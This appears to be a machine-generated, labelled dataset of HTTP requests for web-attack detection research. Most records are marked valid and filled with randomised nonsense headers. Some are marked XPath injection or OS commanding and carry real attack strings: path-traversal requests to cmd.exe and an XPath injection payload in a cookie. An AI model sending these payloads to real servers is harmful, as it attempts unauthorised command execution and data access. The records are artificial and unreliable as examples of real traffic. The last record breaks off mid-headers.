Referer: http://www.it1noirt.net/eddfle/dhmnhot/itdjeso/Aoovoy/lsohuh.asmx
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: Accept-Language
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 8.2; rt-fh; rv:3.0.5) Gecko/13034433
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8072x4973
Via: iPcjar/7.0 www.xigd.png
Transfer-Encoding: gzip
Upgrade: tra/9.5, gMiod/2.9, d4ehe/2.4
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 65007245456337542415
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38197
Start - Id: 24121
class: Valid
GET /neeScrel7rsdlw/b_LHYgF/xoswirenibsei/oe/ssd2sfgtea/spp/eYK2wVDIzw/8-libRNdSe/wtsotsnu/MSsQ5RqKVr._Pw/tgeoOisahne.png?Ipqntehzxnie=v3tqwhed&mailIt095O=3&7Ee=3systemi%7ClAmCb+pf&ee=dr&elmn=5KCr&tufneir5di=2726 HTTP/1.1
Host: 137.205.60.5
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: yttT-dgcl;q=0.8, nleee2-Aqcleieu;q=0.4, cihue-9urne
Cache-Control: no-store
Client-ip: 161.43.125.4
Cookie: elrrt=eedDenfxhoe2Hstdinh;oaLBhLuS=W;nksattlvew3ct=bnrNNkWt;nHx=23;ixesltatNni7y=le5=ofVezi2z2meta
Cookie2: $Version="9"
Date: Tue, 26 Jun 07 23:45:31 GMT
ETag: W/"csn8IelteXHYnWTqdNm"
Expect: 100-continue
From: teocayH@bcantyn.net
If-Modified-Since: Wed, 23 Dec 09 06:03:01 GMT
If-Unmodified-Since: Tue, 22 Apr 08 16:48:45 CET
If-Match: *
If-None-Match: "Kbq8mjABJxzv_uMF8MO"
If-Range: Tue, 25 May 04 14:18:02 GMT
Max-Forwards: 12
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: rephn 9uuqEn=draec
Range: -293,9-
Referer: /Nhcgrnu/iybhsGe/exNttiIe.nsf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.9 (X11; U; Open BSD i386 7.8; zs-tn; rv:8.3.4) Gecko/99008305
UA-CPU: StrongARM
UA-Disp: 3355,078,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 109x7677
Via: HTTP/9.3 www.dd3r.js, 3.6 80.39.173.17, 8.5 www.ehnGshaa.css
Transfer-Encoding: compress
Upgrade: hlnn4/1.8
Warning: 382 www.ni2t.htm "ztadtttA6sydiidea" "Fri, 07 Jan 05 08:48:11 CET"
X-Forwarded-For: 33.216.101.183
X-Serial-Number: 98139157905
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24121
Start - Id: 18357
class: Valid
GET /ivZegyAU0UlSZcdRUxBE/a5el.1y05mNnca/tADps6roeo3l/tK@ZCnApxg/ne/sdLwtaewdto.css?Nlsn3TIeaEO=T+de HTTP/1.0
Host: 127.28.100.201
Connection: close
Accept: */*;q=0.1
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 7.228.83.69
Cookie: ztdtfosbEPruma=22725;aepheznaassrxr3=xlscriptTDhe
Cookie2: $Version="653"
Date: Mon, 04 Jan 10 17:42:41 CET
ETag: W/"hbfxRV2Py0k_JJXKxc."
Expect: 100-continue
From: Mdai@mc9ui.com
If-Modified-Since: Thu, 09 Apr 09 03:57:38 GMT
If-Unmodified-Since: Wed, 16 Apr 08 10:06:44 GMT
If-Match: "pFfPrA7bmg8fQHSkGXpD"
If-None-Match: "h29P8o_HYqIXtov"
If-Range: Wed, 02 Jul 08 06:16:30 GMT
Max-Forwards: 860
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Ta4ne eeunze=ehg4j4se
Range: 14861-5
Referer: /dtRmxn/eioeEeeC.wmn
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (compatible; MSIE 0.7; Windows NT; vnwr; rhdeoiaabo; yfHdsrD)
UA-CPU: x86
UA-Disp: 7961,862,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0744x394
Via: 5.2 233.8.30.169, HTTP/8.4 61.35.3.162, 2.7 36.44.68.155
Transfer-Encoding: 1Weeed
Upgrade: qqdshd/4.3, htgf/9.7, yet/3.2
Warning: 749 108.217.159.253:908 "s7e4ipslsmltnjmoswu2" 
X-Forwarded-For: 157.29.76.83
X-Serial-Number: 185669982950
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18357
Start - Id: 17011
class: Valid
GET /eBpZ49NDqovREhSF/0@.sock_streamR/bTlAPcurpieEEo/qsi.pl? HTTP/1.1
Host: www.a2heerRu.biz
Connection: czubj
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 181.128.235.48
Cookie: ra6oaoehOun=67;Ha= ptoie/ lo5;uIwfhow4sl=teixqgq9aei;md5m=8;zwaia3InYlinert=89;mcaqw4tih5slr=w7sageetbpirhdc6iy
Cookie2: $Version="11"
Date: Mon, 12 May 08 23:50:46 CET
ETag: W/"rQUR9_zzqLgR9TS"
Expect: 100-continue
From: aYei@It3si.net
If-Modified-Since: Wed, 15 Oct 08 04:20:32 UTC
If-Unmodified-Since: Sun, 12 Oct 08 20:36:59 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Oct 08 13:56:28 CET
Max-Forwards: 86
MIME-Version: 2.6
Pragma: G5srniiu='sgtrwoap'
Proxy-Authorization: Digest uri=http://www.mqws1rq.net/2ejt/rr0e/eam4.sh
Authorization: Digest opaque="p3rtozg"
Range: 88101-
Referer: /rDaye/shyIf/grno9mp.htm
TE: trailers,chunked;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/7.6 (compatible; MSIE 7.1; WinNT; inhUtei)
UA-CPU: StrongARM
UA-Disp: 065,8353,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 044x401
Via: 6.8 44.191.148.12, FTP/0.2 223.67.199.6
Transfer-Encoding: identity
Upgrade: ttoEw/6.5, etora/0.5, nscq/3.4, car/1.9
Warning: 449 www.oaah.tiff "trlelutje" 
X-Forwarded-For: 208.229.111.62
X-Serial-Number: 380344
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17011
Start - Id: 2981
class: Valid
GET /1oe9pucpm8ifw8i3u/hOMpZs/u5FUoAEcTz7sUV/s1nM09Vw/tied82xbeh6nsrlfd/apGv604eASpM8AfG/waAbqDcW/hZjAjbJzuQNIZ359wX/tJp/rGHgitZTAwHPfo/6eihst0tt9fitvriiL/h4Cgroup by1MPuXO1eY.bin? HTTP/1.0
Host: 165.150.138.247:472
Connection: etion4sr
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: c3l-z
Cache-Control: min-fresh=72
Client-ip: 225.222.184.214
Cookie: xtaseiIzlder=et;4QoZdZ3=4ordeletes;aarrnoeluAle5di=83;tjirsofso=57605961;1iecsO=dEiratacalb
Cookie2: $Version="982"
Date: Sat, 19 Mar 05 10:58:19 UTC
ETag: W/"66RL1dmJH@90KFgG-ne"
Expect: 100-continue
From: sMew@IhehlCaold.be
If-Modified-Since: Fri, 15 Jul 05 21:09:35 CET
If-Unmodified-Since: Mon, 22 Jan 07 20:35:13 UTC
If-Match: *
If-None-Match: "p5UW8rEDDKojLNA"
If-Range: Thu, 28 Feb 08 06:34:22 UTC
Max-Forwards: 579
MIME-Version: 8.6
Pragma: irsenin='ooms'
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: Sr7xm liwt=oavymed
Range: 941701-436,57-,44-
Referer: /nnGeepil/iindiRug/6icaeted.zip
TE: chunked,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (Windows; U; WinNT 7.0; n8-f5; rv:6.4.2) Gecko/02904495
UA-CPU: StrongARM
UA-Disp: 5870,274,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4979x0191
Via: 8.6 99.110.110.189, 9.6 www.lii7.tiff:7333
Transfer-Encoding: deflate
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2981
Start - Id: 48422
class: XPathInjection
GET /iCfCu/2WlroTxBwRxrdHyzvn3G/nlaaauSdnren/cEomekHYCu.nsf?ohloa=tet&ni=zl0H6nz&hIibosi9ientn=fudi2em%5Cm30yvdreag&znlbAsqySvtgnb=Aeqeqef&e7aqlq0s8e=wyXTdfgjs&0uCVGPvES=pEgYgj7F2E&lnps=ofdwp-&2CdO1vnXGN=ilyZ5Hhb9Z HTTP/1.1
Host: www.rcemest.st:80
Connection: irehtHt
Accept: */*;q=0.0
Accept-Charset: iso-8859-5;q=0.0
Accept-Encoding: *
Accept-Language: 1joe2aia-aztd;q=0.3
Cache-Control: max-age=25840
Client-ip: 170.52.122.155
Cookie: dys=rnu2e;onp=2    or    1<    ts/csdiha/mneosp/child::text()[position()=48]   or     11858='] | /* | /foo[bar=';wdoyemYswpnret=67852;atrywtedpSm=mrhh <;fp=2029664
Date: Sun, 22 Nov 09 03:35:54 CET
If-Modified-Since: Sun, 25 Jan 04 11:55:51 GMT
If-Unmodified-Since: Wed, 25 Nov 09 04:59:44 UTC
If-None-Match: *
If-Range: Wed, 22 Jun 05 06:21:08 CET
Pragma: no-cache
Referer: /Aifo/1sTrT/0t4ksnz/Zmweelrt.png
TE: trailers,deflate;q=0.3,deflate
Trailer: Host
User-Agent: 8gossrfVdsi5i9r
UA-Color: color32
X-Serial-Number: 2509612458
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48422
Start - Id: 19727
class: Valid
GET /oruqrt6henisteMvistj/altxn6ra/wuV9SJ.KadminAanxi/eco9tluimaesbinie3sy/uQD/dtagzseolL7n/pR4hsaes6ZrEid/eIxmVy3fEnqbmTG/Xlda/evOHqDR5c2kcKn.mspx?0OCImocha_AY=+&nirPieeovh4=caeaomhtoc2gees&earS8=hzSfqAou&eDEiewinp=ds5%7C60dmia0s&poo=E&km66A=hhTaethiseaenyoctt&ipn=8739486 HTTP/1.1
Host: 140.219.164.47
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: rto-nthdcorg;q=0.2, u3IoguiV-3shn0ttt
Cache-Control: only-if-cached
Client-ip: 125.18.9.170
Cookie: bseueomgosa=wobS;oineonen8gvUl=ay4$ejlraeho;b1necaLeto2ae=98838531;evnowxiztltama=nMd
Cookie2: $Version="96"
Date: Sun, 29 May 05 14:31:09 UTC
ETag: "V1lWg_ncK6h5OV@1t"
Expect: int1eyb
From: Soneyf@vxodosnt.net
If-Modified-Since: Sat, 01 Dec 07 21:47:40 GMT
If-Unmodified-Since: Fri, 25 Apr 08 15:23:48 CET
If-Match: "v87wVU1ngYcuKK_yyZ"
If-None-Match: "R5kolU2sGU6N-.4"
If-Range: "3PciEcw8w.eZv4sP1"
Max-Forwards: 03
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM aWVyN3VzaG8wbmhjaGNhb214SW9uN2FldHMzTWl0c2RvYW4ya2lIcGQ=
Authorization: rere gwesktij=aEidRrra
Range: 4774-
Referer: http://snuo0m5d.fr/qtzure4s/71ehENDd/ntqwi0.mdb
TE: gzip;q=0.6,trailers,gzip;q=0.6
Trailer: Max-Forwards
User-Agent: d@Rj3G http://www.ateea.cz
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 399x404
Via: 3.2 www.re1aeAha.shtml:16, FTP/9.9 www.mlsjyFk.js, 3.6 235.223.202.188:412
Transfer-Encoding: eTuo5
Upgrade: rdodaE/7.9, zoyttb/5.8, zrr8/7.2, elvwx/8.7
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 030710631868878
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19727
Start - Id: 44428
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 119.225.109.227
Connection: close
Accept: text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: do-o6r, DLnHed-mmiia;q=0.8, 4ytjhIs-csckghkC;q=0.0, rod-hrdn, ypen3bx-uzmi;q=0.5
Cache-Control: no-transform
Client-ip: 27.105.36.250
Cookie: Ht6UF5Hds=rLyrts;-.mMYLFawr3=ua5I6nN6Igei
Cookie2: $Version="74"
Date: Thu, 16 Feb 06 24:55:34 GMT
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sat, 25 Feb 06 16:45:11 CET
If-Unmodified-Since: Mon, 29 Dec 08 06:09:27 GMT
If-Match: "hQOO.YwZs1b3wzs_H"
If-None-Match: "pc2xKH6cbzmo6vafF"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="orIrleta"
Authorization: ltsapd bGeI7t=ierdreT
Range: 6-02287,72753-
Referer: /eeRaz/cdicbebt.bin
TE: deflate;q=0.1,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 4.8; h2-tu; rv:4.9.8) Gecko/05980879
UA-CPU: Sparc
UA-Disp: 4806,9378,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 053x237
Via: 8.6 248.170.100.124:6
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 42253
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44428
Start - Id: 4380
class: Valid
POST /dYaf1.3gnXKBUU50bFi/aqU6qqvTq4O/ioteta/dG/t894k4TTS-j.dll? HTTP/1.1
Content-Length: 179
Content-Language: ewNae,uozn,g
Content-Encoding: deflate
Content-Location: /Raokyie/xOe6.js
Content-MD5: cXNuZzhuNnUycnRpelJzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 16:25:55 CET
Last-Modified: Mon, 02 Nov 09 12:59:57 GMT
Host: www.Oc8tb.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932, ks_c_5601-1987;q=0.1, us-ascii;q=0.1, isiri-3342;q=0.8
Accept-Encoding: 
Accept-Language: c2t-tohsl2;q=0.1
Cache-Control: min-fresh=810
Client-ip: 204.226.34.249
Cookie: telnetxbgsoundFS0XU=2706575426;4sctahu=44;9ududx4defci7sE=Rdecdneuostnfnree;iNiae=63235808;9YrSUTW2=lsim1u8
Cookie2: $Version="183"
Date: Fri, 26 Sep 08 08:14:40 UTC
ETag: "4YWEme.AtoWHmSf"
Expect: 3lAzn=siin88t;f3ntx7ro
From: aetadtfe@elerak5o.uk
If-Modified-Since: Thu, 11 Dec 08 17:13:14 CET
If-Unmodified-Since: Tue, 10 Nov 09 22:28:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 23
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: mtor drf6oc=wfds
Authorization: Basic aXUxb213ZDpwRGxzOQ==
Range: 1237-117
Referer: http://nndrF.be/r7azho/evewaap8/pAotoiT/nxkeom.mdb
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.5 (Windows; U; Win98 4.1; n6-mz; rv:2.7.5) Gecko/73311124
UA-CPU: MIPS
UA-Disp: 7270,8918,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 109x8284
Via: Tnxhog/2.4 9.207.94.215, qEdn8e/8.9 www.chguQ.tiff
Transfer-Encoding: identity
Upgrade: elEf8p/9.8, lro/2.1, 5boo/9.9, FaC/4.1, P28mrw/1.1
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 165.173.10.44
X-Serial-Number: 5443838
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s0xo0jnolil=8nich&fi=e0hi&his6iygsrr=Lk 3&uui=3881706&iheb=73&e4eet=vart &neelfaTs=7&jJLI-p=e~;olystdineh&JaDd.etxt=bevdt&ot3argae=n8bjr194&Fl-w2MqP84=hc@&at8noeyh52xhbtY=pq

End - Id: 4380
Start - Id: 13268
class: Valid
GET /uu/xue7n1aeifezpeg/passwdShbody8tV/p3oneeg3t9gex/yL_sXthdi2rK/4c8lZh2nxVn9wt/ipPhCIzG.dll?copyJ_EgiOgU2=h4qn&osDspnnou3iu=r-v7LfNN&ooetdn2=79338&rzjrhisTeitsod=allee%3B&Wuawra=l%40hh&fuhbee3sdonm=8e1idformtaekscriptsiNIserTa&moHila=wi8fOwewyliaheuu&vq5OoiglinkFE6=oinputnm&yHotD=ieHa86p&KeZr@ZGRQnetcatT=lmrA&t4sl1mhreebx4ch=8aU&XpNJRd=T%3C%27echopq HTTP/1.0
Host: www.iA1nf.com:04
Connection: eein55e
Accept: */*
Accept-Charset: windows-1254, iso-8859-7;q=0.3
Accept-Encoding: deflate;q=0.1
Accept-Language: nsei-Ic9asmu7, aeii-sw4t;q=0.4, ssC-1m;q=0.3, tbtq8sd-ik;q=0.5
Cache-Control: no-transform
Client-ip: 44.248.244.179
Cookie: Lm7ecg=emon@;hlehEe6er=Do$:
Cookie2: $Version="68"
Date: Thu, 03 Nov 05 01:55:10 UTC
ETag: W/"IHhobgIcKInx@1uGfC"
Expect: oxIda=eu5R9Na;ypalmfe
From: Geng@tdt1lr9s.biz
If-Modified-Since: Wed, 17 Dec 08 04:54:41 GMT
If-Unmodified-Since: Sun, 17 Oct 04 23:24:41 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 987
MIME-Version: 0.5
Pragma: nHvn='ibsnf3ne'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dHJrc2ltbG86dnZPeTV0emE=
Range: 219-
Referer: /Hpamvd/e67ar/Geet/703s.php
TE: trailers,deflate;q=0.9,gzip;q=0.1
Trailer: Date
User-Agent: pobN63xp http://www.vert.uk
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2344x540
Via: 5.0 62.191.61.95:59
Transfer-Encoding: compress
Upgrade: wR3/7.6, otia/4.2, tdnt3/1.1, nttir/7.7, l7tde/6.2
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13268
Start - Id: 43664
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 148.63.249.154
Connection: N2uanse
Accept: video/quicktime, video/mpeg, text/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Cookie: iwlMxrebad=67297664;9aimvp=9q_CAtew;JKux=93712;RKZQ=hotE2enqS8
Date: Mon, 26 May 08 15:14:01 CET
ETag: W/"vIAsssT5MPBJtm8Z8RlU"
If-Modified-Since: Fri, 16 Dec 05 18:16:43 CET
If-Unmodified-Since: Sun, 09 Dec 07 13:12:33 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: "aQv.P6W6o6GbeiSxKqn"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.2
Pragma: no-cache
Referer: /hjisem/cHet0e6.wav
TE: chunked,gzip;q=0.9
User-Agent: Mozilla/1.7 (X11; U; Open BSD i586 0.1; h4-th; rv:7.8.6) Gecko/74316443
Via: 9.9 www.Amne.tiff, 3.5 45.238.138.186:02693
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 751 56.29.223.90 "eeBwlaace" 
X-Forwarded-For: 209.40.83.3
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43664
Start - Id: 26581
class: Valid
GET /asOoegr3neiLl3em/ni/riabWmBLhqzG/jiRbNuTX9/yRe1bpe/ajzVGP/mRtsnseLrtt/tdlevmRXU34/tR.jpeg?taAyje0obhcl=04714&kMGALB=ahElsBTteirr&kd=78&RweOnestR1tnt=16&L6OfvarGuX.=h++a&ietegshOyv=Vrot5tm+bzdh%28%5Bhftp+as&deecqnjr=83835&ko6uhlo=btbt&sgtbnEolest=sII%26Q%7Ck&pcgnhuh=066357746&ilvhU=mdrbg+x6S HTTP/1.0
Host: 110.206.208.240
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.8, iso-8859-5, x-mac-roman
Accept-Encoding: identity;q=0.5, compress;q=0.3, deflate, deflate
Accept-Language: *;q=0.6
Cache-Control: max-age=57
Client-ip: 129.144.104.6
Cookie: qUz6owef6nt=peIe 
Cookie2: $Version="7"
Date: Mon, 08 Mar 10 14:32:03 CET
ETag: W/"eSGBUSsnP9_6ns8"
Expect: 100-continue
From: sFiwdel@a8ea.net
If-Modified-Since: Mon, 28 May 07 05:14:29 GMT
If-Unmodified-Since: Thu, 31 Jan 08 04:31:10 UTC
If-Match: "SMrlsFUrl_CSo-UOMhqc"
If-None-Match: "SQ1DFqctIJYrNrxg"
If-Range: Sun, 11 Feb 07 13:31:01 UTC
Max-Forwards: 4511
MIME-Version: 6.0
Pragma: dioryosA='42np1'
Proxy-Authorization: Digest uri=http://sniw.net/oseoo/7nuds5/tfhcgi.wmn
Authorization: Digest uri=http://uHlls4v.com/ehzcPr.mspx
Range: 5377-633943,-28808
Referer: /yryE1st.dll
TE: deflate
Trailer: Accept-Language
User-Agent: 1las/9.2
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 335x343
Via: HTTP/8.7 www.o2ms.jpeg, 1.8 119.164.82.57:88982, HTTP/1.6 94.114.253.191
Transfer-Encoding: identity
Upgrade: Itor/8.8, int/1.5, dtfmcr/2.5
Warning: 846 14.21.113.100 "fyetrt" 
X-Forwarded-For: 14.228.155.87
X-Serial-Number: 693373977262
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26581
Start - Id: 30269
class: Valid
GET /7Yn3uxxS/8dtlnsdoee7rpiln7/tYUdqYheh0RQpDvY/tunXmdBnoZH/4mh9sr0olfe7nn/qX8-zC@9ULuC1/efAemtiir1/hPxBcDtzM08o@-PgNt9/xHXGcpDpr/e1SJ/Mnall49TGwFd.mdb?T3myaCuIIskedoI=+&laeR=49362104&trshrnE4Riwiion=nec3dwcem9sreO&t9oseha7r=012&Mgeo=l%3Btisnmndk+&yc=connect%5CHghqxit+%29hn%5C%29Sdlocationn&No1in=caw&9dlx2uremason=a-_T&riti=004 HTTP/1.1
Host: 124.24.197.73:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.3, iso-8859-3, koi8;q=0.3
Accept-Encoding: compress;q=0.7, compress;q=0.6, deflate, compress, compress;q=0.7
Accept-Language: s9g-ecTq, n-veegmdA;q=0.0, eQoonz-oRfaata;q=0.7, uEb6gt-ljsea7ee;q=0.6, sbq-e1o
Cache-Control: eOe='n07axa'
Client-ip: 25.215.137.185
Cookie: 1Rp-yuWI1nph-=47opzeet6;wezgrsXdeolua=osock_streami79o(;tziIr17ocog==voeakx Nehsucopy ode;-eiIKf=el
Cookie2: $Version="068"
Date: Thu, 20 Mar 08 06:31:39 UTC
ETag: "FxV2CAJA_8@TSGKbYY"
Expect: 8aWO=eyUest2
From: iaDu8xrn@BrjrrRgg.gov
If-Modified-Since: Thu, 12 Aug 04 05:19:31 UTC
If-Unmodified-Since: Sat, 12 Aug 06 22:29:50 GMT
If-Match: "kpuRxl2aWTkggA@J"
If-None-Match: *
If-Range: *
Max-Forwards: 148
MIME-Version: 4.6
Pragma: ihal4=3et
Proxy-Authorization: Digest qop=auth
Authorization: Basic ZG5hYTpBcmFraWxvYw==
Range: 836-,969-8
Referer: http://yoeN.org/msarn/NooLtioi/9eyN.css
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: eFCKxjX0H8 http://www.ttrrme.de
UA-CPU: StrongARM
UA-Disp: 790,434,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9593x7407
Via: 1.4 50.30.242.129, FTP/7.5 www.hwhaHe.htm, 5.0 www.ieesq.js
Transfer-Encoding: compress
Upgrade: jaw9oy/8.3, q9g/6.3, tdaoep/1.0
Warning: 129 www.4od57o.jpeg "yOsa6fhl9hr" "Tue, 17 Jul 07 20:05:50 UTC"
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 605112430
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30269
Start - Id: 33613
class: Valid
PUT /1P4I/2wroK/Atrxg.shtml? HTTP/1.1
Content-Length: 30
Content-Language: mgreojr,aaae
Content-Encoding: deflate
Content-Location: /manxuos/Wttsda.jpg
Content-MD5: dWFlMm5sM2FuemlxbnRlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Oct 06 14:55:10 UTC
Last-Modified: Fri, 16 Jun 06 18:05:44 GMT
Host: 173.52.38.14
Connection: close
Accept: image/png, image/jpeg, audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate;q=0.0, identity;q=0.2, identity;q=0.8
Accept-Language: theooaEu-9glo, Nrullaaw-gn;q=0.0, mM-h4tyb0jm, hNfig-ehancw;q=0.5, hap-sswa1cm;q=0.1
Cache-Control: only-if-cached
Client-ip: 239.255.99.116
Cookie: Rhas2=e servicesn;30DinputtJboot.ini=r]Es?;omb2rmsRNo=eSxMviU9U;ashnhrn4femg=n+n;zPjh1connectCJYV=gesehl8orrmrIitu
Cookie2: $Version="43"
Date: Sat, 09 Dec 06 09:08:47 GMT
Expect: 09mhtnBl=aFdo7s
If-Modified-Since: Tue, 14 Oct 08 14:27:40 GMT
If-Unmodified-Since: Thu, 22 Jan 09 09:49:28 UTC
If-Match: "4bN97Jcb1OQRzH-"
If-None-Match: *
If-Range: Sat, 13 Jun 09 06:44:16 UTC
Max-Forwards: 023
MIME-Version: 0.2
Pragma: no-cache
Authorization: Digest nonce
Range: 409459-7,-297771
Referer: http://ejwlou.uk/erorr/tGoooe5/ilRgI/3H7zOei3/4a1f.exe
TE: trailers,trailers,trailers
User-Agent: sVyNjd http://www.akyc2.net
UA-OS: Windows 95
UA-Color: color8
Via: nir9/4.4 www.3eta.gif:0, adn/3.5 232.56.51.75
Transfer-Encoding: deflate
Warning: 832 www.ehihKame.gif "khIC0" 
X-Forwarded-For: 246.11.40.158

R4.9=0644349872&sba9e24sm=gnou

End - Id: 33613
Start - Id: 48531
class: XPathInjection
POST /rW@cyDY@wwR5bG.BI/0NZLN_opSf@UP6MAb/3Str96i8dU/6a0Amha/amNq@Jw3UiP/iGeibvsorl/rXfXCFUvZ@T/mOCrN8hNWGIlmxTQrgw8.jpg? HTTP/1.0
Content-Length: 165
Content-Language: 0oldusA,ohf
Content-Encoding: identity
Content-Location: http://7ap2.de/gfrt/rnN0.png
Content-MD5: YWw1NDRrd25zb29lNGdjaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Sep 05 16:15:14 UTC
Last-Modified: Sat, 08 Aug 09 05:59:30 CET
Host: 8.47.243.51
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-6;q=0.7, us-ascii, x-mac-chinesetrad, isiri-3342;q=0.5, x-mac-arabic
Accept-Encoding: gzip;q=0.2, deflate, identity, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 251.229.101.220
Cookie: erb=rno6arn;e8fNyedo=li6;F1X.zorWpvYiH=a
Cookie2: $Version="5"
Date: Wed, 07 Mar 07 09:45:47 CET
ETag: W/"tBZi-pENw9GtkAl"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Mon, 11 Sep 06 04:36:49 UTC
If-Match: "BOjIfGZGn9WdOo6G"
If-None-Match: *
If-Range: "5Lhgk9biuM8pQYQ"
Max-Forwards: 63
MIME-Version: 9.6
Pragma: aScsv='Tha8eBn'
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: Digest response="C19cB6D9F6aAeED5efaDaa9ACDB2Ffc2"
Range: 51-93,35-2637,65821-
Referer: /c2iisqer/r6re5a/bnihs/nAim/eevl.nsf
TE: deflate
Trailer: Max-Forwards
User-Agent: teGEs5wmiu/0.5.3.0
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: FTP/6.9 www.rl22ie.jpeg
